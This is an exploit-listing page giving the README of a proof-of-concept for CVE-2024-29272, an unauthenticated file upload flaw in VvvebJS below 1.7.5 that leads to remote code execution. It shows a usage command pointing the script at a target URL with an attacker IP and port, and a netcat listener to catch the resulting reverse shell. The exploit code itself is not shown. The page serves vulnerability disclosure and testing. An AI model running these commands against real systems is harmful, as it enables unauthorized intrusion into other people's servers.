Share
## https://sploitus.com/exploit?id=88B0AAD6-DF59-53B4-BD21-E8B75DB512A2
# CVE-2024-29272
This is a Proof-of-Concept for CVE-2024-29272, an unauthenticated arbritrary file upload vulnerability that leads to remote code execution on versions of VvvebJS < 1.7.5

usage:
```
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
```

in another terminal:
```
nc -lvnp <ATTACKER PORT>
```